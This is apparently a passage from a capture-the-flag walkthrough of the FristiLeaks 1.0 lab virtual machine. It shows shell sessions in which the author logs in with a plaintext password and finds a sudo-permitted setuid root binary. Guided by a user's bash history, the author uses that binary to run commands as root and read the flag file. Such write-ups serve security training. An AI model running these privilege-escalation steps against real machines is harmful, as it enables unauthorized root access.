1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin  eezeepz    fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -al
ls -al
total 20
drwx------  2 fristigod fristigod 4096 Nov 19 01:40 .
drwxr-xr-x. 5 root      root      4096 Nov 19 01:40 ..
-rw-r--r--  1 fristigod fristigod   18 Sep 22 12:40 .bash_logout
-rw-r--r--  1 fristigod fristigod  176 Sep 22 12:40 .bash_profile
-rw-r--r--  1 fristigod fristigod  124 Sep 22 12:40 .bashrc
bash-4.1$ 

After enumeration, I found something interesting:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

After checking the file /var/fristigod/.secret_admin_stuff/doCom, I know this binary is owned by root and the sticky bit has been set. It will allow people to run command as ROOT.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
bash-4.1$ ls -al /var/fristigod/.secret_admin_stuff/doCom
ls -al /var/fristigod/.secret_admin_stuff/doCom
-rwsr-sr-x 1 root root 7529 Nov 25 05:53 /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ strings /var/fristigod/.secret_admin_stuff/doCom
strings /var/fristigod/.secret_admin_stuff/doCom
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setuid
exit
strcat
stderr
system
getuid
fwrite
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
Nice try, but wrong user ;)
Usage: ./program_name terminal_command ...
bash-4.1$ 

But when I run the binary file /var/fristigod/.secret_admin_stuff/doCom, I got wrong user error message :(`

1
2
3
4
5
6
7
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom
/var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$ 

After further enumeration… I finally got clues in /var/fristigod/.bash_history

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Let’s go rooting now!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom 'ls -al /root'
[sudo] password for fristigod: LetThereBeFristi!

total 48
dr-xr-x---.  3 root root 4096 Nov 25 04:09 .
dr-xr-xr-x. 22 root root 4096 Dec 27 17:50 ..
-rw-------   1 root root 1936 Nov 25 06:10 .bash_history
-rw-r--r--.  1 root root   18 May 20  2009 .bash_logout
-rw-r--r--.  1 root root  176 May 20  2009 .bash_profile
-rw-r--r--.  1 root root  176 Sep 22  2004 .bashrc
drwxr-xr-x.  3 root root 4096 Nov 25 05:53 .c
-rw-r--r--.  1 root root  100 Sep 22  2004 .cshrc
-rw-------.  1 root root 1291 Nov 17 06:51 .mysql_history
-rw-r--r--.  1 root root  129 Dec  3  2004 .tcshrc
-rw-------.  1 root root  829 Nov 17 09:17 .viminfo
-rw-------.  1 root root  246 Nov 17 12:19 fristileaks_secrets.txt
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom 'cat /root/fristileaks_secrets.txt'
stileaks_secrets.txt'ristigod/.secret_admin_stuff/doCom 'cat /root/fri
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1


bash-4.1$ 

Done..

2015-12-29 01:40:24 -0500